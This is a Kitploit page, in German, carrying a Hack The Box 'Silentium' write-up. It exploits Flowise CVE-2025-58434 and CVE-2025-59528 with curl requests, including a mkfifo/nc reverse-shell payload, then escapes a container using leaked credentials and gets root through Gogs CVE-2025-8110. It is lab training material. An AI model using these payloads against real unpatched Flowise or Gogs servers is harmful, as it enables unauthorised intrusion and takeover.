Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
HTB-Silentium-Writeup — Hack The Box - Silentium-Maschinen-Writeup | CVE-2025-58434, CVE-2025-59528, CVE-2025-8110 | Kitploit
Tools/GitHubGitHub/twappz/htb-silentium-writeup
Privilege EscalationSchwachstellenanalyseExploitationInformationsbeschaffungWebsicherheitCTFPenetrationstestsLernen & BildungContainer-Ausbruch
GitHubtwappz/htb-silentium-writeup

HTB-Silentium-Writeup

Hack The Box - Silentium-Maschinen-Writeup | CVE-2025-58434, CVE-2025-59528, CVE-2025-8110

1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

HTB - Silentium Writeup

Hack The Box Difficulty OS

Maschinen-Info

  • Name: Silentium
  • Betriebssystem: Linux
  • Schwierigkeit: Easy
  • CVEs: CVE-2025-58434, CVE-2025-59528, CVE-2025-8110

Enumeration

Nmap-Scan

root@kitploit:~
nmap -sC -sV -p- --min-rate 5000 <IP> -oN nmap.txt

Offene Ports: 22 (SSH), 80 (HTTP)

Virtuelle Hostsstaging.silentium.htb läuft mit Flowise 3.0.5


Erster Zugang — Flowise RCE

CVE-2025-58434 — Unauthentifizierter Passwort-Reset-Token-Leak

Der forgot-password-Endpunkt gibt das tempToken direkt in der API-Antwort preis.

root@kitploit:~
curl -s http://staging.silentium.htb/api/v1/account/forgot-password \
  -X POST -H "Content-Type: application/json" \
  -d '{"user":{"email":"[email protected]"}}'

Verwende das geleakte tempToken, um das Passwort zurückzusetzen:

root@kitploit:~
curl -s http://staging.silentium.htb/api/v1/account/reset-password \
  -X POST -H "Content-Type: application/json" \
  -d '{"user":{"email":"[email protected]","tempToken":"<TOKEN>","password":"Hacked123!"}}'

CVE-2025-59528 — Authentifizierte RCE über CustomMCP

Melde dich an, um einen API-Schlüssel zu erhalten, und löse dann die RCE aus:

root@kitploit:~
curl -s http://staging.silentium.htb/api/v1/node-load-method/customMCP \
  -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <API_KEY>" \
  -d '{"loadMethod":"listActions","inputs":{"mcpServerConfig":"({x:(()=>{process.mainModule.require(\"child_process\").exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <LHOST> 443 >/tmp/f\");return 1;})()})"}}'

Shell im Docker-Container als root erhalten.


Container-Escape

Umgebungsvariablen überprüft:

root@kitploit:~
env

Anmeldedaten gefunden:

  • FLOWISE_USERNAME=ben
  • FLOWISE_PASSWORD=F1l3_d0ck3r

SSH zum Host:

root@kitploit:~
ssh ben@<IP>

Privilege Escalation — Gogs CVE-2025-8110

Gogs läuft intern auf Port 3001 als root.

SSH-Tunnel einrichten:

root@kitploit:~
ssh -L 8080:127.0.0.1:3001 ben@<IP>

Konto auf Gogs über http://127.0.0.1:8080 registriert, API-Token erzeugt.

CVE-2025-8110 — Symlink-Bypass in der PutContents-API

Den Exploit von TYehan verwendet:

root@kitploit:~
python3 exploit.py \
  --url http://127.0.0.1:8080 \
  --username <user> \
  --password <pass> \
  --token <token> \
  --host <LHOST> \
  --port 4446

Root-Shell erhalten! 🎉


Flaggen

  • User-Flagge: /home/ben/user.txt
  • Root-Flagge: /root/root.txt

Verwendete Tools

  • nmap
  • curl
  • ffuf
  • netcat
  • Python3

Referenzen

  • CVE-2025-58434
  • CVE-2025-59528
  • CVE-2025-8110 Zu /etc/hosts hinzugefügt:
Tool herunterladen